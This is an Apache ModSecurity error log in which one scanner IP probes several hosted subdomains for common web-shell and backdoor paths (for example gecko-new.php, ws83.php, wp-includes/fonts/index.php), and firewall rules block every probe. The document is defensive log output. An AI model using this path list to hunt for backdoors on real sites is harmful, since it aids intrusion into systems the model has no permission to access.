[Tue May 26 19:37:43.836981 2026] [security2:error] [pid 70836:tid 70956] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/manager.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwmwAAuHc"]
[Tue May 26 19:37:43.912328 2026] [security2:error] [pid 70836:tid 70957] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/w1.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwnwAAwXg"]
[Tue May 26 19:37:43.949809 2026] [security2:error] [pid 70836:tid 70876] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/wp-login.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwlQAAuyc"]
[Tue May 26 19:37:44.027477 2026] [security2:error] [pid 70836:tid 70874] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/default.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVwpQAA0iU"]
[Tue May 26 19:37:44.053886 2026] [security2:error] [pid 70836:tid 70884] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/wp-login.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwlgAAxS8"]
[Tue May 26 19:37:44.108162 2026] [security2:error] [pid 70836:tid 70891] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/i.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVwpwAAnDY"]
[Tue May 26 19:37:44.132144 2026] [security2:error] [pid 70836:tid 70959] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/default.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVwqAAAiHo"]
[Tue May 26 19:37:44.171655 2026] [security2:error] [pid 70836:tid 70960] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/wp-login.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVwqQAAqXs"]
[Tue May 26 19:37:44.187711 2026] [proxy:error] [pid 70836:tid 70961] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:37:44.187766 2026] [proxy_http:error] [pid 70836:tid 70961] [remote 20.151.117.104:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:37:44.188408 2026] [proxy:error] [pid 70836:tid 70961] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:37:44.188442 2026] [proxy_http:error] [pid 70836:tid 70961] [remote 20.151.117.104:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:37:44.208380 2026] [security2:error] [pid 70836:tid 70890] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/i.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVwqwAAzTU"]
[Tue May 26 19:37:44.251818 2026] [security2:error] [pid 70836:tid 70963] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/default.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVwrgAAn34"]
[Tue May 26 19:37:44.264728 2026] [security2:error] [pid 70836:tid 70892] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/wp-includes/Requests/library/index.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVwsAAAmzc"]
[Tue May 26 19:37:44.326492 2026] [security2:error] [pid 70836:tid 70895] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/i.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVwugAAwDo"]
[Tue May 26 19:37:44.341994 2026] [security2:error] [pid 70836:tid 70899] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/wp-content/themes/index.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVwvAAAtj4"]
[Tue May 26 19:37:44.375314 2026] [security2:error] [pid 70836:tid 70898] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/wp-includes/Requests/library/index.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVwwAAA-T0"]
[Tue May 26 19:37:44.418828 2026] [security2:error] [pid 70836:tid 70901] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/gecko-new.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVwwgAA5EA"]
[Tue May 26 19:37:44.451615 2026] [security2:error] [pid 70836:tid 70883] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/wp-content/themes/index.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVwwwAAly4"]
[Tue May 26 19:37:44.495754 2026] [security2:error] [pid 70836:tid 70887] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/NewFile.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVwxAAA2zI"]
[Tue May 26 19:37:44.528799 2026] [security2:error] [pid 70836:tid 70882] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/gecko-new.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVwxQAA8S0"]
[Tue May 26 19:37:44.579425 2026] [security2:error] [pid 70836:tid 70886] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/wp-Blogs.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVwxwAAtzE"]
[Tue May 26 19:37:44.586417 2026] [security2:error] [pid 70836:tid 70881] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/wp-includes/Requests/library/index.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVwyQAA3Cw"]
[Tue May 26 19:37:44.604150 2026] [security2:error] [pid 70836:tid 70900] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/NewFile.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVwywAA2j8"]
[Tue May 26 19:37:44.656190 2026] [security2:error] [pid 70836:tid 70906] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/wp-includes/fonts/index.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVwzAAA-EU"]
[Tue May 26 19:37:44.661782 2026] [security2:error] [pid 70836:tid 70907] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/wp-content/themes/index.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVwzQABBEY"]
[Tue May 26 19:37:44.679512 2026] [security2:error] [pid 70836:tid 70888] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/wp-Blogs.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVwzgAAtTM"]
[Tue May 26 19:37:44.736416 2026] [security2:error] [pid 70836:tid 70889] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/gecko-new.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVwzwAA6zQ"]
[Tue May 26 19:37:44.740807 2026] [security2:error] [pid 70836:tid 70962] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/themes.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVw0AAAsX0"]
[Tue May 26 19:37:44.754210 2026] [security2:error] [pid 70836:tid 70908] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/wp-includes/fonts/index.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVw0QAAzkc"]
[Tue May 26 19:37:44.812075 2026] [security2:error] [pid 70836:tid 70896] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/NewFile.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVw0gAAlTs"]
[Tue May 26 19:37:44.817201 2026] [security2:error] [pid 70836:tid 70897] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/cv.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVw1AAA5zw"]
[Tue May 26 19:37:44.829667 2026] [security2:error] [pid 70836:tid 70902] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/themes.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVw1wAA-kE"]
[Tue May 26 19:37:44.887588 2026] [security2:error] [pid 70836:tid 70903] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/wp-Blogs.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVw2wAA0EI"]
[Tue May 26 19:37:44.895819 2026] [proxy:error] [pid 70836:tid 70905] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:37:44.895875 2026] [proxy_http:error] [pid 70836:tid 70905] [remote 20.151.117.104:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:37:44.896497 2026] [proxy:error] [pid 70836:tid 70905] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:37:44.896542 2026] [proxy_http:error] [pid 70836:tid 70905] [remote 20.151.117.104:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:37:44.905016 2026] [security2:error] [pid 70836:tid 70904] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/cv.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVw3QAAi0M"]
[Tue May 26 19:37:44.978674 2026] [security2:error] [pid 70836:tid 70909] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/wp-includes/fonts/index.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVw4QAAhUg"]
[Tue May 26 19:37:44.980827 2026] [security2:error] [pid 70836:tid 70928] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/wp-content/uploads/index.php"] [unique_id "ahWpMO_FvbQ_BhqVMRVw4gAA2Fs"]
[Tue May 26 19:37:45.053675 2026] [security2:error] [pid 70836:tid 70931] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/themes.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVw5wAArF4"]
[Tue May 26 19:37:45.059305 2026] [security2:error] [pid 70836:tid 70933] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/ws83.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVw6AAA7GA"]
[Tue May 26 19:37:45.067705 2026] [security2:error] [pid 70836:tid 70934] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/wp-content/uploads/index.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVw6wAAh2E"]
[Tue May 26 19:37:45.128516 2026] [security2:error] [pid 70836:tid 70941] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/cv.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVw8AAAumg"]
[Tue May 26 19:37:45.137001 2026] [security2:error] [pid 70836:tid 70939] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/atex1.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVw8QAAoWY"]
[Tue May 26 19:37:45.142676 2026] [security2:error] [pid 70836:tid 70942] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/ws83.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVw8gAAy2k"]
[Tue May 26 19:37:45.213538 2026] [security2:error] [pid 70836:tid 70943] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/class-t.api.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVw9wAA1Go"]
[Tue May 26 19:37:45.239436 2026] [security2:error] [pid 70836:tid 70914] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/atex1.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVw-AAAo00"]
[Tue May 26 19:37:45.249359 2026] [security2:error] [pid 70836:tid 71026] [client 107.150.120.129:48088] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "restmoll.com"] [uri "/"] [unique_id "ahWpMe_FvbQ_BhqVMRVw-wAAAME"]
[Tue May 26 19:37:45.292758 2026] [security2:error] [pid 70836:tid 70915] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/w.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVw_QAAvE4"]
[Tue May 26 19:37:45.316207 2026] [security2:error] [pid 70836:tid 70938] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/class-t.api.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVw_gAAkWU"]
[Tue May 26 19:37:45.370306 2026] [security2:error] [pid 70836:tid 70917] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/archive.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxAAAAslA"]
[Tue May 26 19:37:45.384244 2026] [security2:error] [pid 70836:tid 70918] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/wp-content/uploads/index.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxAwAAnVE"]
[Tue May 26 19:37:45.391164 2026] [security2:error] [pid 70836:tid 70919] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/w.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxBAABAlI"]
[Tue May 26 19:37:45.445535 2026] [security2:error] [pid 70836:tid 71012] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVw5gAAALM"]
[Tue May 26 19:37:45.448177 2026] [security2:error] [pid 70836:tid 70912] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/bless.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxCQAA6ks"]
[Tue May 26 19:37:45.459190 2026] [security2:error] [pid 70836:tid 70923] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/ws83.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxCgAAn1Y"]
[Tue May 26 19:37:45.466430 2026] [security2:error] [pid 70836:tid 70924] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/archive.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxCwABAFc"]
[Tue May 26 19:37:45.526805 2026] [security2:error] [pid 70836:tid 70916] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/sagax1.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxDwAAr08"]
[Tue May 26 19:37:45.535951 2026] [security2:error] [pid 70836:tid 70911] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/atex1.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxEQAA20o"]
